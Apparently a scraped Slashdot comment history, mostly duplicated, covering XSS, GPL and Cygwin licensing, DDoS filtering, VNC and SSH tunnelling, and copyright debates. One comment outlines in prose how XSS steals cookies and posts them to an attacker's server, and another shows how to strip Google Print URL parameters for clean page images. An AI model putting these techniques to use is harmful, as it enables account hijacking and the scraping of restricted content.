"Score: 5, Informative"? Hardly. You are misinterpreting. This has nothing to do with phishing. If this is anything like the majority of XSS attacks all you need to do is get the victim to READ your email. Not click on anything, not enter any info, just view the email.
The key here is that google must santize all emails so that any embedded javascript is not executed. If you can craft an email that gets by google's filtering, then then javascript will be run in the context of the google.com domain, which means it has access to the google.com cookies. That's what the "cross" in Cross Site Scripting means -- getting your script code run under the pretext of some other site's URL. The cookie security model means that if the browser is running javascript from a page from google.com then it has access to google's cookies. But javascript running in a page on attacker.com does not have access to google.com's cookies, only those for attacker.com.
From there it's a simple matter to submit the data (create a form with a couple of fields and call its submit() function) to a server under the attacker's control. From there they have the login name and cookie data for the victim, and can now log on as them.
The same sort of attack is the motivation behind a lot of other XSS attacks. For example, say there was a forum script (*chough* phpBB *cough*) that did not sanitize input sufficiently. Normally, if you type javascript into a post it should be quoted or escaped so that it's not executed. However, if you fool this quoting code, then your javascript will run when the page is viewed. So you make a post that contains this javascript code, then whoever views your post will cause the JS to execute, and since it's a page under the forum's domain it has access to the forum's cookies. So you somehow transmit that data back to the attacker, and now he can log on as anyone that read the malicious post. No user intervention necessary.
Re:Is it an open protocol?
on
Replacing TCP?
·
· Score: 1
By default, all executables link against this library (and in the process include GPL'd Cygwin glue code). This means that unless you modify the tools so that compiled executables do not make use of the Cygwin library, your compiled programs will also have to be free software distributed under the GPL with source code available to all.
So, if you compile a Cygwin binary (that requires the Cygwin DLL), your program must be GPL because Cygwin is GPL.
Alternatively, Redhat offers two alternatives, both documented on that page: Any OSI-certificed license is acceptable, so your code could be BSD and still link to the GPL library. Or, you can purchase a buy-out license.
However, the website in this case was distributing Cygwin-compiled binaries without source, which unless they bought the Redhat buyout thing violates the Cygwin license.
I suspect their response would be just to remove the Cygwin binaries. However they still have an obligation to provide source to anyone they gave the binaries to. "The cat's out of the bag" so to speak once you distribute the first binary copy to one person.
I agree that BIND is used widely but it has an attrocious security record. Software that has a terrible record of horrible security flaws doesn't just become secure because past bugs are fixed in the current version. Compare the security record of djbdns with BIND for a good example of secure-by-design versus "spaghetti code from decades ago when security didn't matter"
There's nothing you as an individual company / organization can really do, for all the reasons you've listed.
However, if there was a concerted effort among ISPs to implement proper filtering of packets, then at least DDoS attacks that used spoofed sources would be impacted. This can't solve all types of attacks, and it requires significant cooperation and motivation because currently there is little incentive to do so. Basically you configure your border routers not to pass packets that you know are invalid -- those with RFC1918 addresses, bogon addresses, and addresses outside of your AS. This is all documented in BCP38.
So basically, tell your boss that to prevent attacks like this you can have him mandate that whatever company you decide to buy connectivity from must implement BCP38. If ISPs have an actual incentive to do this, instead of just a bunch of grey-bearded admins saying it would be a good idea, then perhaps it would be implemented more widely. Essentially, tell him to make his purchasing decisions based on "good network stewardship" and not just lowest price. If more companies did this then as a whole the DDoS landscape would clean up just a little bit.
There was recently a long thread on nanog about this. It's good reading as it shows from the operator side of the fence how the situation is known to be improveable but there's no financial (and thus managerial) reason to do it.
No, they do not. They block requests based on the HTTP Referer field. That is very different than null-routing, which is obvisouly a distinction you don't understand. One is about blocking packets in your ISPs upstream, before they even arrive at your system. This is the only way to deal with a true denial of service attack (not a slashdotting). Anything that blocks at the application/webserver level is only effective against resource-depletion attacks, or slashdottings. When you're being (D)DoS-ed you get so many packets that they overwhelm your connection completely, making it futile to even bother looking at the packets because there would be no way to let the legitimate ones through even if you wanted to. In other words, a stream of 200MBit/s flowing to a 10MBit/s link renders it totally useless, you might as well just shut it off.
Re:Is it an open protocol?
on
Replacing TCP?
·
· Score: 1
They're also in violation of the GPL by distributing binaries linked against the Cygwin DLL without providing source. Cygwin is GPL'd, and linking against it requires your project to be GPL'd, unless they bought the pricey GPL buy-out license from redhat. Thus, they cannot provide Cygwin binaries without source, even if they're not distributing cygwin1.dll itself.
So, I commend the author for wanting to help his friend, but is this really the best way of going about it?
First of all, as other posters have mentioned it seems unlikely that a regular 640x480 camera is going to have sufficient resolution to be able to read a license plate. In order to cover all possible positions that a car might park in, you have to keep a pretty wide angle, which means you lose the ability to zoom in on details. Judiging from the screen shots it just didn't seem very realistic that you'd be able to get useful license plate info. I wonder if he even lives in a state that has both front and rear-facing plates. Not all states do, it seems to be the minority.
On top of that, most burglaries happen in the darkness I would think, and he didn't mention anything about infrared lighting. Plus, I would imagine most half-decent burglars would conceal their identity to some degree, like wearing a hat or a mask of some kind. Plus, he only covered the front door -- surely there are other windows and doors that the crook might use.
I think the article would have been a lot better if he'd actually tested these theories in some nontrivial way. For example, drive up in a car at night, and pretend to force the (unlocked) door open, wearing a baseball hat or skimask. Then sit down and look at the images. Zoom in on them, enhance them, whatever. See if you can read the plates, and see if you can discern any physical details other than "young male, medium build" such as facial features. The whole theory here is that by doing this he would have useful evidence to turn over to the police should it ever happen again, so it would seem that such a simple test would have been useful.
That aside -- what was this article supposed to be? A software review? A how-to for this specific software? The bulk of it was spent going over mundane installation details of Apache and PHP. Surely there are better places to look (like the documentation and forums that he lauded) if you're actually trying to install this thing. There was too little review of it functionality for it to be a useful "review" piece, and too little technical detail for it to be a comprehensive document of how to install the thing. I just didn't think it was very well thought-out. A review-type piece where he summarized his experience would have been a lot easier to read and more enjoyable. I mean, I don't really care what config switches he needed to use, that's all covered in the product's manual if I'm actually going to install it myself.
It differs because it's synthetic. It's created by the attorney to be as persuasive as possible. Contrast a police photo of the crime scene with the attorney pointing to various locations and verbally explaining his version of the incident to a 3-D CGI rendered "flyby" of the scene with all sorts of re-enactment style "he was standing here", "he meant to shoot here", "it might have looked like this" annotations. With a high enough budget those things can tend to look like Hollywood movie versions of reality. In other words, you can twist reality by artificially implying that because some fancy 3-D rendition of a scene went some way, then it must have gone that way in reality. The jury and judge should be exposed to neutral evidence, such as what is collected by the police investigators, and not have the full computer graphics arsenal of tools that can put many different spins on reality. If you want to demonstrate how the bullet pierced the man's artery, for example, then find a medical textbook that shows the artery, blow it up, and have the medical expert witness point to it as he testifies. If you allow attorneys the ability to generate extravagent computer-generated recreations then they will find all sorts of ways of being as persuasive as possible - and thus prejudice the jury.
Note that I don't think a plain PowerPoint presentation consisting of only text necessarily has this capability, I'm more referring to the third point above of calling anything graphical and flashy "PowerPoint."
There's nothing that says the kernel is an all-or-nothing venture. If they convinced owners of 90% of the core code to re-license then they could just nuke the rest of the code from the tree and either a) disable support for those devices/options or b) wait for or pay for someone to rewrite those parts.
That said I don't think any of the key core developers is going to go anywhere near this any time soon, so your overall point is valid. However, there is no requirement to find and convince _every_ copyright holder. Just delete the code that you can't license. If it's required for your purposes then rewrite it, otherwise just drop support for that. Any kernel developer that refused the offer would only be holding up their individual code contributions from inclusion in the bsd tree, not the rest of the kernel. Naturally, people with significant code would be in that list however, so again I'm not saying this is realistic.
If that were a desire of microsoft then why haven't try tried to "embrace and extend" FreeBSD? I see no closed source "Microsoft FreeBSD" on the market. Same with all the other *BSDs. I think you're just trying to find things to blame them for here when the fact is that there are plenty of robust BSD-licensed operating systems that Microsoft has no desire to touch. I see no reason why they'd start with linux.
Because it makes it possible to create all sorts of derivative works or products based on linux while giving the big middle finger to the community.
Want to create a wireless router/gateway with rich functionality but can't/won't publish the driver source? Sure, just take this wacko BSD copy of the linux kernel and write your proprietary hardware driver, then ship the product. No need to interact with the community, no need to provide the source to that driver. Most importantly, there's no need to pussyfoot around that userspace/kernelspace boundary and associated headaches, as you currently have to do if you want tobuild a proprietary product around linux.
Got some hardware thing that needs TCP/IP filtering/firewall capability? Just lift iptables code. You don't have to bother trying to do it "the right way", you just copy and paste the code, without guilt. No need to donate your spiffy new features and extentions back to the community -- screw them, this is business. As has been pointed out elsewhere in the comments, use of the GPLd iptables code in commercial products happens VERY often and has led to a number of settlements based on GPL complaints. All of that hassle goes away if it's BSD-licensed.
In fact I'm sure there are tons of embedded companies that would love to get their paws on linux in an truly "unencumbered" form. You have complete control to add functionality to either kernel or user-space, without having to go through all the pains of binary-only drivers. No need to fuss with satisfying users who want the source, no need to worry about violating your NDAs on hardware specs. Just a 100% pure tested, proven, scalable platform that is yours to use for any purpose whatsoever without restriction. Hell I'm sure $50k is chump change to most companies to never have to worry about licensing issues for a product.
Oh come on, did you even look at the documentation? Your example isn't even close to correct syntax. It's not as bad as you're trying to make it out to be.
inserts: INSERT r TUPLE {x 1, y 3}; r += TUPLE {x 1, y 3};
deletes: DELETE r WHERE x = 2; r -= WHERE x = 2; r -= [ x = 2 ];
updates: UPDATE r WHERE x = 2 SET ( y:= 3, z:= 4); r @= WHERE x = 2 SET ( y:= 3, z:= 4 ); r @= [ x = 2 ] SET ( y:= 3, z:= 4 ); r @= [ x = 2 ] ( y:= 3, z:= 4 );
Thank You. Mod parent up. I'm so very tired of seeing "fair use" equated with "right to copy entire albums/CDs in entirety for noncommercial purposes." Fair use means you can, for example, sample a 30 second exerpt of a song for the purposes of critique. It does not mean you can copy the whole album because your friend said it was good and you weren't planning on buying it anyway.
dupewatch.com is currently available. Someone for the love of god please set this up. The "editors" (not that they actually edit) have proven time and time again that they don't give a crap about dupes, so I think social ridicule is in order.
I suppose technically you could consider that DRM but it's certainly only meant to stop the casual user. If someone wanted to print the pages they can and will, and subject to rate-limiting I'm sure you could script it if you wanted to snarf many pages.
Basically you can define certain zones to be delegation-only, or you can tell it that they should all be treated that way, except for the specified list.
Right of first sale applies to physical property that you own. That includes the CD, manual, box, etc. You do not own the software itself, you are granted a license to use it. You're free to sell the physical property all you want but that does not mean you also own the intellectual property.
When you buy a book, it does not mean you own the right to the text - you can't go print off more copies and sell them, or make derivative works based on the characters or plot.
When you buy sheet music, you own the physical printed copy, not the rights to the song itself.
When you buy software you own the physical CD and packaging, not the actual program itself, which is licensed. It sucks, but that's the way it is. Trying to apply the right of first sale to something that you don't own is going about it the wrong way.
> Why did you choose TightVNC? Why not RealVNC, UltraVNC, or TridiaVNC?
Because it's the best of the lot. Try them and you'll see. TightVNC has the most advanced compression options. It has the best configuration-panel. For example, you can specify the remote address directly as either a port or as a "display number". The other ones make you enter a display number, which is clunky if you only know the port ("display = port + 32500" or something arbitrary like that.) Just little things like that.
>Is it better to pay for VNC software, like Tridia VNC Pro or Radmin?
I wouldn't know but I suspect not.
> Which software has video resolution scaling of the remote desktop?
That's one thing that VNC doesn't / can't do well. They are working on a new VNC protocol that should address this, though. I believe they're looking for donations to support the development. The tightvnc page has details.
>What security is best? Is it good to use a VPN for secure access, or is SSH better?
VPN is a vague term. In some contexts you can use SSH to create a VPN. For example, let's say I want to pop my mail from my mail server. But POP3 shows passwords in plaintext so I don't want to do it over the wire. Plus it's just for me so I don't want a POP3 server listening on a public interface if I don't have to. So I setup a ssh tunnel, and forward ports 25 and 110 across it. Now I just enter "localhost" for POP3 and SMTP servers in my email program and viola! I use the "autossh" utility (run as a Windows service) to maintain the tunnel, using RSA public key authentication for secure passwordless login. I don't even have to think about it or touch it, the service starts up at boot and seamlessly sets up the tunnel, and restarts it if it goes down.
You can do something similar for lots of protocols.
>What Windows SSH server do you use?
OpenSSH for both client and server - good enough for OpenBSD, good enough for me. The Cygwin port has full functionality.
I am in the same boat as the parent and great-grandparent.
If you keep a close watch on your system it would be obvious when a new process shows up on the list*. I keep task manager running at all times and like to monitor memory usage, total processes, CPU usage, etc. Other good tools are Process Explorer and TCPView (sysinternals.com). I use Privoxy and so all web activity is shown in the console, as well as the tray icon animation.
But besides that I hit up the trend micro virus scan every 3 to 6 months just for shits and grins, never once had anything. Never once, I should add, in more than 10 years of being connected to the internet, and BBSes before that.
If you use skip MS Lookout and IE, and know what the hell you're doing, it becomes pretty dard hard for malware and viruses to get on your system - without running all that godawful "firewall bloatware" that Symantec / McAfee and friends have turned into.
[*] 50 Quatloos to the person who mentions the fact that a sufficiently sophisticated piece of malware could install a kernel-level driver that would hide its presense from such tools. However, it would have to be very advanced to evade all the various 3rd party tools at hand, like Process Explorer. Besides, to do anything useful it would consume network resources, which I would also notice. And such an exploit would most definitely make a splash on the security mailing lists, which I follow, so I would be aware of it.
You get root on your own "box" which is really just a partition of a larger server. You can install and maintain any version of whatever software you want. It's much cheaper than renting a whole dedicated server, but you get all the benefits. You can do whatever you want on your server because it's all virtualized, so the only restrictions in place are the amount of HD space, amount of bandwidth, and amount of RAM. Thrash it as hard as you want within those boundaries, no one will care.
For $25 a month the arshost.com bronze package satisfies everything you mentioned: 3GB partition, 50GB per month transfer, and 64MB of ram. 64MB seems like not much but linux is surprisingly efficient and without a X11 desktop environment you can do a lot with a little. It's certainly more than enough for a full PHP/Python/Perl/MySQL/Apache development environment.
Disclaimer: I am a satisfied customer of theirs, but otherwise have no vested interest.
Oh and by the way there is no such thing as "unlimited traffic." You either get a bandwidth cap (e.g. 50GB per month) or you get an "unmetered line" which is rate-limited instead (e.g. 1Mbit.) In both cases it's just different ways of stating how much you can use. Anything advertising "unlimited traffic" is very likely to be either a scam or a heavily oversold shared server, or both.
So I happened upon this story a bit late... I go to load the page and get the following:
learn.arc.nasa.gov is down for emergency maintenance.
A hardware failure occurred on Thursday (9-30-2004) due to increased server load. We are building a new server and expect to be online by Tuesday (10-05-2004). Web pages and forums will be unavailable until then. -Randy Kim, NASA Learning Technologies
For World Wind information and software, please visit opensource.arc.nasa.gov. We are working on a new World Wind patch to fix current issues and improve performance. Please check back with us soon.
Could it be that slashdot actually caused damage to their server? I always thought you guys were joking about that one...
Yes. Microsoft did do a number of significant kernel-level improvements in XP. It's not "just a bunch of eye candy" on top of 2k as the party line would go. Here is a link to the paper Windows XP: Kernel Improvements Create a More Robust, Powerful, and Scalable OS by Russinovich and Solomon. Some of the improvements include: Larger Mapped Files, More Efficient Trimming of the Working Set, Reduced Lock Contention, Push Locks, Fast System Calls, Faster Hibernate and Resume, and Prefetching. Next time someone tells you that "2k is the best, XP is just a bunch of eye candy added on top" tell them to read that article and stop the spread of misinformation.
Wow, are you really that dense that you don't see how this could be done in a way that it's legal? Follow me here...
1. Company makes deal with many labels. "In exchange for us giving you X per month you give us the right to offer your content for unlimited download to our members"
2. Company makes deal with university so that all students are enrolled in this program in return for some flat fee being added to everyone's student fees. Company balances its books such that money taken in here is equal to or greater than money paid out in #1.
3. Student uses service and downloads anything offered on service. Because all offerings have had their license negotiated, student is 100% legal.
The important thing to realize here is that this deal does not mean you can go leech anything from any site anywhere. Just like any other service you are restriced to whatever is offered. Anything you download is by definition legitimately licensed. This obviously does not cover things outside of the service, but nobody said it did.
Sheesh... using a slashdot post to further one of those link-referral schemes... You should be ashamed of yourself. What's next, someone appending Google text ads to all of their posts for a commission?
Slashdot Mirror
"Score: 5, Informative"? Hardly. You are misinterpreting. This has nothing to do with phishing. If this is anything like the majority of XSS attacks all you need to do is get the victim to READ your email. Not click on anything, not enter any info, just view the email.
The key here is that google must santize all emails so that any embedded javascript is not executed. If you can craft an email that gets by google's filtering, then then javascript will be run in the context of the google.com domain, which means it has access to the google.com cookies. That's what the "cross" in Cross Site Scripting means -- getting your script code run under the pretext of some other site's URL. The cookie security model means that if the browser is running javascript from a page from google.com then it has access to google's cookies. But javascript running in a page on attacker.com does not have access to google.com's cookies, only those for attacker.com.
From there it's a simple matter to submit the data (create a form with a couple of fields and call its submit() function) to a server under the attacker's control. From there they have the login name and cookie data for the victim, and can now log on as them.
The same sort of attack is the motivation behind a lot of other XSS attacks. For example, say there was a forum script (*chough* phpBB *cough*) that did not sanitize input sufficiently. Normally, if you type javascript into a post it should be quoted or escaped so that it's not executed. However, if you fool this quoting code, then your javascript will run when the page is viewed. So you make a post that contains this javascript code, then whoever views your post will cause the JS to execute, and since it's a page under the forum's domain it has access to the forum's cookies. So you somehow transmit that data back to the attacker, and now he can log on as anyone that read the malicious post. No user intervention necessary.
So, if you compile a Cygwin binary (that requires the Cygwin DLL), your program must be GPL because Cygwin is GPL.
Alternatively, Redhat offers two alternatives, both documented on that page: Any OSI-certificed license is acceptable, so your code could be BSD and still link to the GPL library. Or, you can purchase a buy-out license.
However, the website in this case was distributing Cygwin-compiled binaries without source, which unless they bought the Redhat buyout thing violates the Cygwin license.
I suspect their response would be just to remove the Cygwin binaries. However they still have an obligation to provide source to anyone they gave the binaries to. "The cat's out of the bag" so to speak once you distribute the first binary copy to one person.
I agree that BIND is used widely but it has an attrocious security record. Software that has a terrible record of horrible security flaws doesn't just become secure because past bugs are fixed in the current version. Compare the security record of djbdns with BIND for a good example of secure-by-design versus "spaghetti code from decades ago when security didn't matter"
Sorry but that's not ironic. You would expect that if any unknown backdoors existed in a closed-source application that they would be found when the source was opened -- that's just common sense. Irony is hard to describe but typically applies when something unexpected happens.
There's nothing you as an individual company / organization can really do, for all the reasons you've listed.
However, if there was a concerted effort among ISPs to implement proper filtering of packets, then at least DDoS attacks that used spoofed sources would be impacted. This can't solve all types of attacks, and it requires significant cooperation and motivation because currently there is little incentive to do so. Basically you configure your border routers not to pass packets that you know are invalid -- those with RFC1918 addresses, bogon addresses, and addresses outside of your AS. This is all documented in BCP38.
So basically, tell your boss that to prevent attacks like this you can have him mandate that whatever company you decide to buy connectivity from must implement BCP38. If ISPs have an actual incentive to do this, instead of just a bunch of grey-bearded admins saying it would be a good idea, then perhaps it would be implemented more widely. Essentially, tell him to make his purchasing decisions based on "good network stewardship" and not just lowest price. If more companies did this then as a whole the DDoS landscape would clean up just a little bit.
There was recently a long thread on nanog about this. It's good reading as it shows from the operator side of the fence how the situation is known to be improveable but there's no financial (and thus managerial) reason to do it.
No, they do not. They block requests based on the HTTP Referer field. That is very different than null-routing, which is obvisouly a distinction you don't understand. One is about blocking packets in your ISPs upstream, before they even arrive at your system. This is the only way to deal with a true denial of service attack (not a slashdotting). Anything that blocks at the application/webserver level is only effective against resource-depletion attacks, or slashdottings. When you're being (D)DoS-ed you get so many packets that they overwhelm your connection completely, making it futile to even bother looking at the packets because there would be no way to let the legitimate ones through even if you wanted to. In other words, a stream of 200MBit/s flowing to a 10MBit/s link renders it totally useless, you might as well just shut it off.
They're also in violation of the GPL by distributing binaries linked against the Cygwin DLL without providing source. Cygwin is GPL'd, and linking against it requires your project to be GPL'd, unless they bought the pricey GPL buy-out license from redhat. Thus, they cannot provide Cygwin binaries without source, even if they're not distributing cygwin1.dll itself.
So, I commend the author for wanting to help his friend, but is this really the best way of going about it?
First of all, as other posters have mentioned it seems unlikely that a regular 640x480 camera is going to have sufficient resolution to be able to read a license plate. In order to cover all possible positions that a car might park in, you have to keep a pretty wide angle, which means you lose the ability to zoom in on details. Judiging from the screen shots it just didn't seem very realistic that you'd be able to get useful license plate info. I wonder if he even lives in a state that has both front and rear-facing plates. Not all states do, it seems to be the minority.
On top of that, most burglaries happen in the darkness I would think, and he didn't mention anything about infrared lighting. Plus, I would imagine most half-decent burglars would conceal their identity to some degree, like wearing a hat or a mask of some kind. Plus, he only covered the front door -- surely there are other windows and doors that the crook might use.
I think the article would have been a lot better if he'd actually tested these theories in some nontrivial way. For example, drive up in a car at night, and pretend to force the (unlocked) door open, wearing a baseball hat or skimask. Then sit down and look at the images. Zoom in on them, enhance them, whatever. See if you can read the plates, and see if you can discern any physical details other than "young male, medium build" such as facial features. The whole theory here is that by doing this he would have useful evidence to turn over to the police should it ever happen again, so it would seem that such a simple test would have been useful.
That aside -- what was this article supposed to be? A software review? A how-to for this specific software? The bulk of it was spent going over mundane installation details of Apache and PHP. Surely there are better places to look (like the documentation and forums that he lauded) if you're actually trying to install this thing. There was too little review of it functionality for it to be a useful "review" piece, and too little technical detail for it to be a comprehensive document of how to install the thing. I just didn't think it was very well thought-out. A review-type piece where he summarized his experience would have been a lot easier to read and more enjoyable. I mean, I don't really care what config switches he needed to use, that's all covered in the product's manual if I'm actually going to install it myself.
It differs because it's synthetic. It's created by the attorney to be as persuasive as possible. Contrast a police photo of the crime scene with the attorney pointing to various locations and verbally explaining his version of the incident to a 3-D CGI rendered "flyby" of the scene with all sorts of re-enactment style "he was standing here", "he meant to shoot here", "it might have looked like this" annotations. With a high enough budget those things can tend to look like Hollywood movie versions of reality. In other words, you can twist reality by artificially implying that because some fancy 3-D rendition of a scene went some way, then it must have gone that way in reality. The jury and judge should be exposed to neutral evidence, such as what is collected by the police investigators, and not have the full computer graphics arsenal of tools that can put many different spins on reality. If you want to demonstrate how the bullet pierced the man's artery, for example, then find a medical textbook that shows the artery, blow it up, and have the medical expert witness point to it as he testifies. If you allow attorneys the ability to generate extravagent computer-generated recreations then they will find all sorts of ways of being as persuasive as possible - and thus prejudice the jury.
Note that I don't think a plain PowerPoint presentation consisting of only text necessarily has this capability, I'm more referring to the third point above of calling anything graphical and flashy "PowerPoint."
There's nothing that says the kernel is an all-or-nothing venture. If they convinced owners of 90% of the core code to re-license then they could just nuke the rest of the code from the tree and either a) disable support for those devices/options or b) wait for or pay for someone to rewrite those parts.
That said I don't think any of the key core developers is going to go anywhere near this any time soon, so your overall point is valid. However, there is no requirement to find and convince _every_ copyright holder. Just delete the code that you can't license. If it's required for your purposes then rewrite it, otherwise just drop support for that. Any kernel developer that refused the offer would only be holding up their individual code contributions from inclusion in the bsd tree, not the rest of the kernel. Naturally, people with significant code would be in that list however, so again I'm not saying this is realistic.
If that were a desire of microsoft then why haven't try tried to "embrace and extend" FreeBSD? I see no closed source "Microsoft FreeBSD" on the market. Same with all the other *BSDs. I think you're just trying to find things to blame them for here when the fact is that there are plenty of robust BSD-licensed operating systems that Microsoft has no desire to touch. I see no reason why they'd start with linux.
Because it makes it possible to create all sorts of derivative works or products based on linux while giving the big middle finger to the community.
Want to create a wireless router/gateway with rich functionality but can't/won't publish the driver source? Sure, just take this wacko BSD copy of the linux kernel and write your proprietary hardware driver, then ship the product. No need to interact with the community, no need to provide the source to that driver. Most importantly, there's no need to pussyfoot around that userspace/kernelspace boundary and associated headaches, as you currently have to do if you want tobuild a proprietary product around linux.
Got some hardware thing that needs TCP/IP filtering/firewall capability? Just lift iptables code. You don't have to bother trying to do it "the right way", you just copy and paste the code, without guilt. No need to donate your spiffy new features and extentions back to the community -- screw them, this is business. As has been pointed out elsewhere in the comments, use of the GPLd iptables code in commercial products happens VERY often and has led to a number of settlements based on GPL complaints. All of that hassle goes away if it's BSD-licensed.
In fact I'm sure there are tons of embedded companies that would love to get their paws on linux in an truly "unencumbered" form. You have complete control to add functionality to either kernel or user-space, without having to go through all the pains of binary-only drivers. No need to fuss with satisfying users who want the source, no need to worry about violating your NDAs on hardware specs. Just a 100% pure tested, proven, scalable platform that is yours to use for any purpose whatsoever without restriction. Hell I'm sure $50k is chump change to most companies to never have to worry about licensing issues for a product.
Oh come on, did you even look at the documentation? Your example isn't even close to correct syntax. It's not as bad as you're trying to make it out to be.
:= 3, z := 4); := 3, z := 4 ); := 3, z := 4 ); := 3, z := 4 );
inserts:
INSERT r TUPLE {x 1, y 3};
r += TUPLE {x 1, y 3};
deletes:
DELETE r WHERE x = 2;
r -= WHERE x = 2;
r -= [ x = 2 ];
updates:
UPDATE r WHERE x = 2 SET ( y
r @= WHERE x = 2 SET ( y
r @= [ x = 2 ] SET ( y
r @= [ x = 2 ] ( y
http://dbappbuilder.sourceforge.net/Rel.html
Thank You. Mod parent up. I'm so very tired of seeing "fair use" equated with "right to copy entire albums/CDs in entirety for noncommercial purposes." Fair use means you can, for example, sample a 30 second exerpt of a song for the purposes of critique. It does not mean you can copy the whole album because your friend said it was good and you weren't planning on buying it anyway.
dupewatch.com is currently available. Someone for the love of god please set this up. The "editors" (not that they actually edit) have proven time and time again that they don't give a crap about dupes, so I think social ridicule is in order.
Oh please. It's just an image. Just look at a packet capture (or any other method) to see its URL. For your example, it was:
3 &img=1&q=mastering+digital+photography&sig=gv2nFpt Ef0dj7Gzb8eZ4U8UdtUo
3 &img=1&sig=gv2nFptEf0dj7Gzb8eZ4U8UdtUo
http://print.google.com/print?id=ULQSG0Zs7vcC&pg=
As you can see from the query parameters the highlighting is done server-side and is pretty trivial to remove:
http://print.google.com/print?id=ULQSG0Zs7vcC&pg=
I suppose technically you could consider that DRM but it's certainly only meant to stop the casual user. If someone wanted to print the pages they can and will, and subject to rate-limiting I'm sure you could script it if you wanted to snarf many pages.
http://www.isc.org/index.pl?/sw/bind/delegation-on ly.php
Basically you can define certain zones to be delegation-only, or you can tell it that they should all be treated that way, except for the specified list.
Right of first sale applies to physical property that you own. That includes the CD, manual, box, etc. You do not own the software itself, you are granted a license to use it. You're free to sell the physical property all you want but that does not mean you also own the intellectual property.
When you buy a book, it does not mean you own the right to the text - you can't go print off more copies and sell them, or make derivative works based on the characters or plot.
When you buy sheet music, you own the physical printed copy, not the rights to the song itself.
When you buy software you own the physical CD and packaging, not the actual program itself, which is licensed. It sucks, but that's the way it is. Trying to apply the right of first sale to something that you don't own is going about it the wrong way.
> Why did you choose TightVNC? Why not RealVNC, UltraVNC, or TridiaVNC?
Because it's the best of the lot. Try them and you'll see. TightVNC has the most advanced compression options. It has the best configuration-panel. For example, you can specify the remote address directly as either a port or as a "display number". The other ones make you enter a display number, which is clunky if you only know the port ("display = port + 32500" or something arbitrary like that.) Just little things like that.
>Is it better to pay for VNC software, like Tridia VNC Pro or Radmin?
I wouldn't know but I suspect not.
> Which software has video resolution scaling of the remote desktop?
That's one thing that VNC doesn't / can't do well. They are working on a new VNC protocol that should address this, though. I believe they're looking for donations to support the development. The tightvnc page has details.
>What security is best? Is it good to use a VPN for secure access, or is SSH better?
VPN is a vague term. In some contexts you can use SSH to create a VPN. For example, let's say I want to pop my mail from my mail server. But POP3 shows passwords in plaintext so I don't want to do it over the wire. Plus it's just for me so I don't want a POP3 server listening on a public interface if I don't have to. So I setup a ssh tunnel, and forward ports 25 and 110 across it. Now I just enter "localhost" for POP3 and SMTP servers in my email program and viola! I use the "autossh" utility (run as a Windows service) to maintain the tunnel, using RSA public key authentication for secure passwordless login. I don't even have to think about it or touch it, the service starts up at boot and seamlessly sets up the tunnel, and restarts it if it goes down.
You can do something similar for lots of protocols.
>What Windows SSH server do you use?
OpenSSH for both client and server - good enough for OpenBSD, good enough for me. The Cygwin port has full functionality.
I am in the same boat as the parent and great-grandparent.
If you keep a close watch on your system it would be obvious when a new process shows up on the list*. I keep task manager running at all times and like to monitor memory usage, total processes, CPU usage, etc. Other good tools are Process Explorer and TCPView (sysinternals.com). I use Privoxy and so all web activity is shown in the console, as well as the tray icon animation.
But besides that I hit up the trend micro virus scan every 3 to 6 months just for shits and grins, never once had anything. Never once, I should add, in more than 10 years of being connected to the internet, and BBSes before that.
If you use skip MS Lookout and IE, and know what the hell you're doing, it becomes pretty dard hard for malware and viruses to get on your system - without running all that godawful "firewall bloatware" that Symantec / McAfee and friends have turned into.
[*] 50 Quatloos to the person who mentions the fact that a sufficiently sophisticated piece of malware could install a kernel-level driver that would hide its presense from such tools. However, it would have to be very advanced to evade all the various 3rd party tools at hand, like Process Explorer. Besides, to do anything useful it would consume network resources, which I would also notice. And such an exploit would most definitely make a splash on the security mailing lists, which I follow, so I would be aware of it.
Get a VDS (virtual dedicated server.)
You get root on your own "box" which is really just a partition of a larger server. You can install and maintain any version of whatever software you want. It's much cheaper than renting a whole dedicated server, but you get all the benefits. You can do whatever you want on your server because it's all virtualized, so the only restrictions in place are the amount of HD space, amount of bandwidth, and amount of RAM. Thrash it as hard as you want within those boundaries, no one will care.
For $25 a month the arshost.com bronze package satisfies everything you mentioned: 3GB partition, 50GB per month transfer, and 64MB of ram. 64MB seems like not much but linux is surprisingly efficient and without a X11 desktop environment you can do a lot with a little. It's certainly more than enough for a full PHP/Python/Perl/MySQL/Apache development environment.
Disclaimer: I am a satisfied customer of theirs, but otherwise have no vested interest.
Oh and by the way there is no such thing as "unlimited traffic." You either get a bandwidth cap (e.g. 50GB per month) or you get an "unmetered line" which is rate-limited instead (e.g. 1Mbit.) In both cases it's just different ways of stating how much you can use. Anything advertising "unlimited traffic" is very likely to be either a scam or a heavily oversold shared server, or both.
Could it be that slashdot actually caused damage to their server? I always thought you guys were joking about that one...
Yes. Microsoft did do a number of significant kernel-level improvements in XP. It's not "just a bunch of eye candy" on top of 2k as the party line would go. Here is a link to the paper Windows XP: Kernel Improvements Create a More Robust, Powerful, and Scalable OS by Russinovich and Solomon. Some of the improvements include: Larger Mapped Files, More Efficient Trimming of the Working Set, Reduced Lock Contention, Push Locks, Fast System Calls, Faster Hibernate and Resume, and Prefetching. Next time someone tells you that "2k is the best, XP is just a bunch of eye candy added on top" tell them to read that article and stop the spread of misinformation.
Wow, are you really that dense that you don't see how this could be done in a way that it's legal? Follow me here...
1. Company makes deal with many labels. "In exchange for us giving you X per month you give us the right to offer your content for unlimited download to our members"
2. Company makes deal with university so that all students are enrolled in this program in return for some flat fee being added to everyone's student fees. Company balances its books such that money taken in here is equal to or greater than money paid out in #1.
3. Student uses service and downloads anything offered on service. Because all offerings have had their license negotiated, student is 100% legal.
The important thing to realize here is that this deal does not mean you can go leech anything from any site anywhere. Just like any other service you are restriced to whatever is offered. Anything you download is by definition legitimately licensed. This obviously does not cover things outside of the service, but nobody said it did.
Sheesh... using a slashdot post to further one of those link-referral schemes... You should be ashamed of yourself. What's next, someone appending Google text ads to all of their posts for a commission?